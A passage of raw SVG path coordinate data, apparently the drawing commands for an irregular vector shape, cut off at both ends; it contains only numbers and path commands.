8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-